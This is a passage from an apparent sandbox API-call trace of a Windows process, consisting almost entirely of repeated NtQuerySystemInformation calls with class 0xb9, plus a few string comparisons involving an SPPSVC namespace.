SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd070, Length=0x50, ResultLength=0x0) [0271.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd070, Length=0x50, ResultLength=0x0) [0271.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd070, Length=0x50, ResultLength=0x0) [0271.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0271.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0271.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0271.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0271.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0271.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0271.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0271.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0271.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd30, Length=0x28, ResultLength=0x0) [0271.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0271.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdb0, Length=0x28, ResultLength=0x0) [0271.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdb0, Length=0x28, ResultLength=0x0) [0271.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0271.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x20, ResultLength=0x0) [0271.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x20, ResultLength=0x0) [0271.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x20, ResultLength=0x0) [0271.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x20, ResultLength=0x0) [0271.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0271.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x20, ResultLength=0x0) [0271.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x20, ResultLength=0x0) [0271.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x20, ResultLength=0x0) [0271.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd070, Length=0x50, ResultLength=0x0) [0271.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd070, Length=0x50, ResultLength=0x0) [0271.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd070, Length=0x50, ResultLength=0x0) [0271.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0271.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0271.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0271.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0271.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0271.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0271.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0271.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0271.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd30, Length=0x28, ResultLength=0x0) [0271.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0271.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdb0, Length=0x28, ResultLength=0x0) [0271.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdb0, Length=0x28, ResultLength=0x0) [0271.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0271.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x20, ResultLength=0x0) [0271.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x20, ResultLength=0x0) [0271.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x20, ResultLength=0x0) [0271.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x20, ResultLength=0x0) [0271.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0271.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x20, ResultLength=0x0) [0271.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x20, ResultLength=0x0) [0271.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x20, ResultLength=0x0) [0271.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd120, Length=0x50, ResultLength=0x0) [0271.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd0a0, Length=0x28, ResultLength=0x0) [0271.633] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd120, Length=0x50, ResultLength=0x0) [0271.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd120, Length=0x50, ResultLength=0x0) [0271.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd120, Length=0x50, ResultLength=0x0) [0271.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd050, Length=0x38, ResultLength=0x0) [0271.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce80, Length=0x28, ResultLength=0x0) [0271.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce80, Length=0x28, ResultLength=0x0) [0271.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce80, Length=0x28, ResultLength=0x0) [0271.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcef0, Length=0x28, ResultLength=0x0) [0271.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd050, Length=0x38, ResultLength=0x0) [0271.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf70, Length=0x28, ResultLength=0x0) [0271.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf70, Length=0x28, ResultLength=0x0) [0271.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd050, Length=0x38, ResultLength=0x0) [0271.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x20, ResultLength=0x0) [0271.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce50, Length=0x20, ResultLength=0x0) [0271.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce50, Length=0x20, ResultLength=0x0) [0271.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce50, Length=0x20, ResultLength=0x0) [0271.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd050, Length=0x38, ResultLength=0x0) [0271.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x20, ResultLength=0x0) [0271.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce60, Length=0x20, ResultLength=0x0) [0271.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce60, Length=0x20, ResultLength=0x0) [0271.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd120, Length=0x50, ResultLength=0x0) [0271.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd0a0, Length=0x28, ResultLength=0x0) [0271.645] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd120, Length=0x50, ResultLength=0x0) [0271.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd120, Length=0x50, ResultLength=0x0) [0271.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd120, Length=0x50, ResultLength=0x0) [0271.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd050, Length=0x38, ResultLength=0x0) [0271.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce80, Length=0x28, ResultLength=0x0) [0271.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce80, Length=0x28, ResultLength=0x0) [0271.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce80, Length=0x28, ResultLength=0x0) [0271.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcef0, Length=0x28, ResultLength=0x0) [0271.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd050, Length=0x38, ResultLength=0x0) [0271.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf70, Length=0x28, ResultLength=0x0) [0271.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf70, Length=0x28, ResultLength=0x0) [0271.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd050, Length=0x38, ResultLength=0x0) [0271.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x20, ResultLength=0x0) [0271.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce50, Length=0x20, ResultLength=0x0) [0271.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce50, Length=0x20, ResultLength=0x0) [0271.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce50, Length=0x20, ResultLength=0x0) [0271.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, 